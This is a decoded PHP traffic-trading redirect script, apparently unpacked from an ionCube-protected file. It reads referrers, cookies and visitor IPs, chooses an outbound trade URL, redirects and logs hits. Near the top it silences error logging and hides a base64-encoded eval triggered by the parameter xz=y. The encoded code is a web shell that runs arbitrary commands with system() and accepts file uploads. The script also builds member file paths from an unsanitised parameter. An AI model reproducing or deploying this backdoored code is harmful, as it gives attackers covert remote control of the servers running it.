@skyflash => ioncube file => decoded 1

1. <?php
2.  
3. function visiteddata($V447b7147, $V3c6e0b8a)
4. {
5.     global $Vd51c3d0d;
6.     if ($V447b7147 == "visited") {
7.         $Vd51c3d0d .= $V3c6e0b8a . ";";
8.     }
9. }
10.  
11. function fbd5fc730($V435ed7e9, &$V8d777f38)
12. {
13.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
14.         flock($V633de4b0, 1);
15.         while ($V5b4d9906 = fgets($V633de4b0, 1024)) {
16.             $Vde695463                      = array();
17.             $Vde695463                      = explode(";", $V5b4d9906);
18.             $V8d777f38[trim($Vde695463[1])] = $Vde695463[0];
19.         }
20.         flock($V633de4b0, 3);
21.         fclose($V633de4b0);
22.     }
23. }
24.  
25. @ini_set("display_errors", 0);
26. @ini_set("error_log", 0);
27. @ini_set("log_errors", 0);
28. error_reporting(0);
29. if ($_GET['xz'] == "y") {
30.     eval(base64_decode("c2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApOwoKcHJpbnQgIjxzdHlsZT5ib2R5e2ZvbnQtZmFtaWx5OnRyZWJ1Y2hldCBtcztmb250LXNpemU6MTZweDt9aHJ7d2lkdGg6MTAwJTtoZWlnaHQ6MnB4O308L3N0eWxlPiI7CgokY3VycmVudFdEICA9IHN0cl9yZXBsYWNlKCJcXFxcIiwiXFwiLCRfUE9TVFsnX2N3ZCddKTsKJGN1cnJlbnRDTUQgPSBzdHJfcmVwbGFjZSgiXFxcXCIsIlxcIiwkX1BPU1RbJ19jbWQnXSk7CgokVU5hbWUgID0gYHVuYW1lIC1hYDsKJFNDV0QgICA9IGBwd2RgOwokVXNlcklEID0gYGlkYDsKCmlmKCAkY3VycmVudFdEID09ICIiICkgewogICAgJGN1cnJlbnRXRCA9ICRTQ1dEOwp9CgpwcmludCAiPHRhYmxlPiI7CnByaW50ICI8dHI+PHRkPjxiPldlIGFyZTo8L2I+PC90ZD48dGQ+Ii4kX1NFUlZFUlsnUkVNT1RFX0hPU1QnXS4iICgiLiRfU0VSVkVSWydSRU1PVEVfQUREUiddLiIpPC90ZD48L3RyPiI7CnByaW50ICI8dHI+PHRkPjxiPlNlcnZlciBpczo8L2I+PC90ZD48dGQ+Ii4kX1NFUlZFUlsnU0VSVkVSX1NJR05BVFVSRSddLiI8L3RkPjwvdHI+IjsKcHJpbnQgIjx0cj48dGQ+PGI+U3lzdGVtIHR5cGU6PC9iPjwvdGQ+PHRkPiRVTmFtZTwvdGQ+PC90cj4iOwpwcmludCAiPHRyPjx0ZD48Yj5PdXIgcGVybWlzc2lvbnM6PC9iPjwvdGQ+PHRkPiRVc2VySUQ8L3RkPjwvdHI+IjsKcHJpbnQgIjwvdGFibGU+IjsKCmlmKCAkX1BPU1RbJ19hY3QnXSA9PSAiTGlzdCBmaWxlcyEiICkgewogICAgJGN1cnJlbnRDTUQgPSAibHMgLWxhIjsKfQoKcHJpbnQgIjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9XCJtdWx0aXBhcnQvZm9ybS1kYXRhXCI+PHRhYmxlPiI7CgpwcmludCAiPHRyPjx0ZD48Yj5FeGVjdXRlIGNvbW1hbmQ6PC9iPjwvdGQ+PHRkPjxpbnB1dCBzaXplPTEwMCBuYW1lPVwiX2NtZFwiIHZhbHVlPVwiIi4kY3VycmVudENNRC4iXCI+PC90ZD4iOwpwcmludCAiPHRkPjxpbnB1dCB0eXBlPXN1Ym1pdCBuYW1lPV9hY3QgdmFsdWU9XCJFeGVjdXRlIVwiPjwvdGQ+PC90cj4iOwoKcHJpbnQgIjx0cj48dGQ+PGI+Q2hhbmdlIGRpcmVjdG9yeTo8L2I+PC90ZD48dGQ+PGlucHV0IHNpemU9MTAwIG5hbWU9XCJfY3dkXCIgdmFsdWU9XCIiLiRjdXJyZW50V0QuIlwiPjwvdGQ+IjsKcHJpbnQgIjx0ZD48aW5wdXQgdHlwZT1zdWJtaXQgbmFtZT1fYWN0IHZhbHVlPVwiTGlzdCBmaWxlcyFcIj48L3RkPjwvdHI+IjsKCnByaW50ICI8dHI+PHRkPjxiPlVwbG9hZCBmaWxlOjwvYj48L3RkPjx0ZD48aW5wdXQgc2l6ZT04NSB0eXBlPWZpbGUgbmFtZT1fdXBsPjwvdGQ+IjsKcHJpbnQgIjx0ZD48aW5wdXQgdHlwZT1zdWJtaXQgbmFtZT1fYWN0IHZhbHVlPVwiVXBsb2FkIVwiPjwvdGQ+PC90cj4iOwoKcHJpbnQgIjwvdGFibGU+PC9mb3JtPjxocj4iOwoKJGN1cnJlbnRDTUQgPSBzdHJfcmVwbGFjZSgiXFxcIiIsIlwiIiwkY3VycmVudENNRCk7CiRjdXJyZW50Q01EID0gc3RyX3JlcGxhY2UoIlxcXCciLCJcJyIsJGN1cnJlbnRDTUQpOwoKaWYoICRfUE9TVFsnX2FjdCddID09ICJVcGxvYWQhIiApIHsKICAgIGlmKCAkX0ZJTEVTWydfdXBsJ11bJ2Vycm9yJ10gIT0gVVBMT0FEX0VSUl9PSyApIHsKICAgICAgICBwcmludCAiPGNlbnRlcj48Yj5FcnJvciB3aGlsZSB1cGxvYWRpbmcgZmlsZSE8L2I+PC9jZW50ZXI+IjsKICAgIH0gZWxzZSB7CiAgICAgICAgcHJpbnQgIjxjZW50ZXI+PHByZT4iOwogICAgICAgIHN5c3RlbSgibXYgIi4kX0ZJTEVTWydfdXBsJ11bJ3RtcF9uYW1lJ10uIiAiLiRjdXJyZW50V0QuIi8iLiRfRklMRVNbJ191cGwnXVsnbmFtZSddLiIgMj4mMSIpOwogICAgICAgIHByaW50ICI8L3ByZT48Yj5GaWxlIHVwbG9hZGVkIHN1Y2Nlc3NmdWxseSE8L2I+PC9jZW50ZXI+IjsKICAgIH0gICAgCn0gZWxzZSB7CiAgICBwcmludCAiXG48cHJlPlxuIjsKICAgICRjdXJyZW50Q01EID0gImNkICIuJGN1cnJlbnRXRC4iOyIuJGN1cnJlbnRDTUQ7CiAgICBzeXN0ZW0oJGN1cnJlbnRDTUQpOwogICAgcHJpbnQgIlxuPC9wcmU+XG48L2NlbnRlcj48aHI+PGNlbnRlcj48Yj5Db21tYW5kIGNvbXBsZXRlZDwvYj48L2NlbnRlcj4iOwp9CgpleGl0Ow=="));
31.     exit();
32. }
33. foreach ($_GET as $V8ce4b16b => $V9e3669d1) {
34.     $_GET[$V8ce4b16b] = str_replace("<?", "", $V9e3669d1);
35. }
36. include("config.php");
37. $V5adf599e = $_SERVER['HTTP_REFERER'];
38. $member    = $_COOKIE['refer'];
39. $V435ed7e9 = "datafiles/blockedlist.dat";
40. if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
41.     flock($V633de4b0, 1);
42.     $V3d801aa5 = @fread($V633de4b0, @filesize($V435ed7e9));
43.     flock($V633de4b0, 3);
44.     fclose($V633de4b0);
45.     $V320a8063 = array();
46.     $V320a8063 = explode("\r\n", $V3d801aa5);
47.     $V90ca62f9 = sizeof($V320a8063);
48.     $V865c0c0b = 0;
49.     while ($V865c0c0b < sizeof($V320a8063)) {
50.         if ($V320a8063[$V865c0c0b] && (strstr($V5adf599e, $V320a8063[$V865c0c0b]) || $member == $V320a8063[$V865c0c0b] || $_SERVER['REMOTE_ADDR'] == $V320a8063[$V865c0c0b] || strstr($_SERVER['HTTP_USER_AGENT'], $V320a8063[$V865c0c0b]))) {
51.             if ($Veb7cc6db) {
52.                 header("Location: {$V5adf599e}");
53.             }
54.             exit();
55.         }
56.         ++$V865c0c0b;
57.     }
58. }
59. $url       = $_GET['url'];
60. $first     = $_GET['first'];
61. $ref       = $_GET['ref'];
62. $link      = $_GET['link'];
63. $Vb1013a7e = $_GET['t'];
64. if (!$member) {
65.     $member = "nocookie";
66.     if ($V92687587) {
67.         $ref = "nocookie";
68.         $url = "";
69.     }
70. }
71. $Vdad12808 = array();
72. if ($V69858820) {
73.     $Vfa75823c = $_SERVER['GEOIP_COUNTRY_CODE'];
74.     $V599f46e3 = $Vfa75823c;
75. } else {
76.     $V599f46e3 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
77.     $Vdad12808 = explode("-", $V599f46e3);
78.     $Vfa75823c = $Vdad12808[0];
79. }
80. if (!$Vfa75823c) {
81.     $Vfa75823c = $V599f46e3 = "blank";
82. }
83. $V3ec88920 = $_COOKIE['page'];
84. $V7d320a89 = $_COOKIE['gbclicks'];
85. if (!$V7d320a89) {
86.     $V7d320a89 = 0;
87. }
88. $V05d80d74 = 0;
89. if ($V0ca2ee97 && $V0ca2ee97 <= $V7d320a89) {
90.     $V05d80d74 = 1;
91. } else if ($V742913f8) {
92.     $V05d80d74 = 1;
93.     $V3d801aa5 = "";
94.     $V435ed7e9 = "datafiles/ips.txt";
95.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
96.         flock($V633de4b0, 1);
97.         $V3d801aa5 = @fread($V633de4b0, @filesize($V435ed7e9));
98.         flock($V633de4b0, 3);
99.         fclose($V633de4b0);
100.     }
101.     if (!strstr($V3d801aa5, ($V7d320a89 + 1) . ";" . $_SERVER['REMOTE_ADDR'] . "\r\n") && strstr($V3d801aa5, $V7d320a89 . ";" . $_SERVER['REMOTE_ADDR'] . "\r\n") && ($V633de4b0 = @fopen($V435ed7e9, "a"))) {
102.         flock($V633de4b0, 2);
103.         fputs($V633de4b0, ($V7d320a89 + 1) . ";" . $_SERVER['REMOTE_ADDR'] . "\r\n");
104.         flock($V633de4b0, 3);
105.         fclose($V633de4b0);
106.         $V05d80d74 = 0;
107.     }
108. }
109. $V38d4765b = $V5adf599e;
110. $V724b1be8 = $V05d80d74;
111. if ($V05d80d74) {
112.     if ($Vd280e0bb) {
113.         $ref = "nocookie";
114.         $url = "";
115.     }
116. } else {
117.     if ($link != "redirect" && !strstr(str_replace("www.", "", $V5adf599e), str_replace("www.", "", $V861ce498))) {
118.         $V724b1be8 = 1;
119.     } else {
120.         if ($_SERVER['HTTP_VIA'] || !$_SERVER['HTTP_ACCEPT'] || !$_SERVER['HTTP_USER_AGENT'] || $Vdf711c9f && time() - $Vdf711c9f < $_SESSION['intm']) {
121.             $V724b1be8 = 1;
122.         } else if ($Vec407cce && $Vec407cce) {
123.             @include("datafiles/jsp.php");
124.             if ($Vb1013a7e != $V146ac5a9) {
125.                 $V724b1be8 = 1;
126.             }
127.         }
128.         $V546b4439 = strpos($V38d4765b, "?");
129.         if ($V546b4439) {
130.             $V38d4765b = substr($V38d4765b, 0, $V546b4439);
131.         }
132.         if (($V38d4765b == $V861ce498 || $V38d4765b == $V861ce498 . "/") && $V3ec88920) {
133.             --$V3ec88920;
134.             if ($V3ec88920 == 0) {
135.                 $V3ec88920 = 2;
136.             }
137.             $V38d4765b = $V861ce498 . "/_main" . $V3ec88920 . ".html";
138.         }
139.     }
140. }
141. $V4d2f3dfb = 0 - 10;
142. $V54f5210f = $V9b3df717 = "";
143. if ($url) {
144.     if ($Vf03c5300 && !isset($_GET['s']) && $link != "redirect") {
145.         if ($Vf03c5300[$V7d320a89] != "T") {
146.             $V54f5210f = "direct";
147.             $V9b3df717 = $url;
148.         }
149.     } else {
150.         if (isset($_GET['s'])) {
151.             $s = ( integer ) $_GET['s'];
152.             if (100 < $s) {
153.                 $s = 100;
154.             }
155.         } else {
156.             $s = 100;
157.         }
158.         if (rand(0, 100) <= $s || $first && $V7d320a89 < $first) {
159.             $V54f5210f = "direct";
160.             $V9b3df717 = $url;
161.         }
162.     }
163. } else if ($ref) {
164.     $V435ed7e9 = "memberfiles/" . $ref . ".dat";
165.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
166.         flock($V633de4b0, 1);
167.         $V739b2f85 = fgets($V633de4b0, filesize($V435ed7e9));
168.         flock($V633de4b0, 3);
169.         fclose($V633de4b0);
170.         $V3d801aa5 = array();
171.         $V3d801aa5 = explode("|", $V739b2f85);
172.         if ($V3d801aa5[15]) {
173.             $V54f5210f = $ref;
174.             $V9b3df717 = $V3d801aa5[15];
175.             $V4d2f3dfb = $V3d801aa5[1];
176.         }
177.     }
178. }
179. if (!$V9b3df717) {
180.     $V3d801aa5 = "";
181.     $V435ed7e9 = "datafiles/outpick.dat";
182.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
183.         flock($V633de4b0, 1);
184.         $V3d801aa5 = @fread($V633de4b0, @filesize($V435ed7e9));
185.         flock($V633de4b0, 3);
186.         fclose($V633de4b0);
187.     }
188.     $outpick = array();
189.     $outpick = explode("\r\n", $V3d801aa5);
190.     if ($V4205ee45) {
191.         $V1d9e6a00 = $V424b30c0 = $dat = array();
192.         $V865c0c0b = 0;
193.         while ($V865c0c0b < sizeof($outpick)) {
194.             $dat                   = explode("|", $outpick[$V865c0c0b]);
195.             $V1d9e6a00[$V865c0c0b] = rand(1, 1000) * $dat[0];
196.             ++$V865c0c0b;
197.         }
198.         asort($V1d9e6a00);
199.         foreach ($V1d9e6a00 as $V3c6e0b8a => $V3a6d0284) {
200.             $V424b30c0[] = $V3c6e0b8a;
201.         }
202.     }
203.     $V865c0c0b = 0;
204.     while ($V865c0c0b < sizeof($outpick)) {
205.         $dat = array();
206.         if ($V4205ee45) {
207.             $dat = explode("|", $outpick[$V424b30c0[$V865c0c0b]]);
208.         } else {
209.             $dat = explode("|", $outpick[$V865c0c0b]);
210.         }
211.         if ($dat[1] && !$_COOKIE[$dat[1]] && $dat[1] != $member && (!$group || $group && strstr($dat[3], $group)) && (!$dat[4] || strstr($dat[4], $V599f46e3) || !strstr($dat[4], "-") && strstr($dat[4], $Vfa75823c))) {
212.             $V9b3df717 = $dat[2];
213.             $V54f5210f = $dat[1];
214.             $V4d2f3dfb = $dat[5];
215.             break;
216.         }
217.         ++$V865c0c0b;
218.     }
219. }
220. if (!$V9b3df717) {
221.     $V435ed7e9 = "memberfiles/auxout.dat";
222.     if ($V633de4b0 = @fopen($V435ed7e9, "r")) {
223.         flock($V633de4b0, 1);
224.         $V739b2f85 = fgets($V633de4b0, filesize($V435ed7e9));
225.         flock($V633de4b0, 3);
226.         fclose($V633de4b0);
227.         $V3d801aa5 = array();
228.         $V3d801aa5 = explode("|", $V739b2f85);
229.         if ($V3d801aa5[15]) {
230.             $V54f5210f = "auxout";
231.             $V9b3df717 = $V3d801aa5[15];
232.         }
233.     }
234. }
235. setcookie("gbclicks", $V7d320a89 + 1, time() + 172800);
236. setcookie($V54f5210f, "visited", time() + 172800);
237. setcookie("ctime", time(), time() + 172800);
238. $Vcff34c13 = 0;
239. if ($Vf3778551 && $V54f5210f != "auxout" && $V54f5210f != "sponsor" && (0 < $V4d2f3dfb || 0 - 10 < $V4d2f3dfb && !rand(0, 9))) {
240.     $Vd51c3d0d = "";
241.     array_walk($_COOKIE, "visiteddata");
242.     if ($Vd51c3d0d) {
243.         $Vd51c3d0d = str_rot13($Vd51c3d0d);
244.         if (strstr($V9b3df717, "?")) {
245.             $Vd51c3d0d = "&gbv=" . $Vd51c3d0d;
246.         } else {
247.             $Vd51c3d0d = "?gbv=" . $Vd51c3d0d;
248.         }
249.     }
250.     $Vcff34c13 = 0 - 1;
251. }
252. header("Location: " . $V9b3df717 . $Vd51c3d0d . "\n");
253. $V013dff02 = 0;
254. if ($V4e807dca && !strstr($V4e807dca, $Vfa75823c)) {
255.     $V013dff02 = 1;
256. }
257. $V8e3f1bbb = $_SERVER['HTTP_USER_AGENT'];
258. $V4124bc0a = array();
259. $V4124bc0a = explode("; ", $V8e3f1bbb);
260. if (strstr($V4124bc0a[1], "MSIE")) {
261.     $V8e3f1bbb = $V4124bc0a[1];
262. } else {
263.     $V4124bc0a = explode(") ", $V8e3f1bbb);
264.     if (3 < strlen($V4124bc0a[1])) {
265.         $V8e3f1bbb = $V4124bc0a[1];
266.     }
267. }
268. if ($V633de4b0 = @fopen("datafiles/hitsout.dat", "a")) {
269.     flock($V633de4b0, 2);
270.     fputs($V633de4b0, $V54f5210f . "|" . $link . "|" . $member . "|" . $V599f46e3 . "|" . $V724b1be8 . "|" . $V013dff02 . "|" . $Vcff34c13 . "|" . $V38d4765b . "|" . $V8e3f1bbb . "|" . $_SERVER['REMOTE_ADDR'] . "\r\n");
271.     flock($V633de4b0, 3);
272.     fclose($V633de4b0);
273. }
274. if (isset($_GET['thumb'], $_GET['pos'])) {
275.     $thumb = $_GET['thumb'];
276.     $pos   = $_GET['pos'];
277.     $rot   = 1;
278.     if ($_GET['rot']) {
279.         $rot = $_GET['rot'];
280.     }
281.     $stats = $V5a423d9e = array();
282.     fbd5fc730("datafiles/rotstat" . $rot . ".dat", &$stats);
283.     fbd5fc730("datafiles/posstat" . $rot . ".dat", &$V86f5dcd7);
284.     fbd5fc730("datafiles/rotator" . $rot . ".dat", &$V5a423d9e);
285.     $V46bc758a = 0;
286.     foreach ($V5a423d9e as $V8ce4b16b => $V9e3669d1) {
287.         if (!($thumb == $V8ce4b16b)) {
288.             continue;
289.         }
290.         $V46bc758a = 1;
291.         break;
292.         break;
293.     }
294.     if ($V46bc758a) {
295.         ++$stats[$thumb];
296.         ++$V86f5dcd7[$pos];
297.         $V14447879 = "";
298.         foreach ($stats as $V8ce4b16b => $V9e3669d1) {
299.             $V14447879 .= $V9e3669d1 . ";" . $V8ce4b16b . "\r\n";
300.         }
301.         if ($V633de4b0 = @fopen("datafiles/rotstat" . $rot . ".dat", "w")) {
302.             flock($V633de4b0, 2);
303.             fputs($V633de4b0, $V14447879);
304.             flock($V633de4b0, 3);
305.             fclose($V633de4b0);
306.         }
307.         $Vb84abdbd = "";
308.         foreach ($V86f5dcd7 as $V8ce4b16b => $V9e3669d1) {
309.             $Vb84abdbd .= $V9e3669d1 . ";" . $V8ce4b16b . "\r\n";
310.         }
311.         if ($V633de4b0 = @fopen("datafiles/posstat" . $rot . ".dat", "w")) {
312.             flock($V633de4b0, 2);
313.             fputs($V633de4b0, $Vb84abdbd);
314.             flock($V633de4b0, 3);
315.             fclose($V633de4b0);
316.         }
317.     }
318. }
319. exit();
320. ?>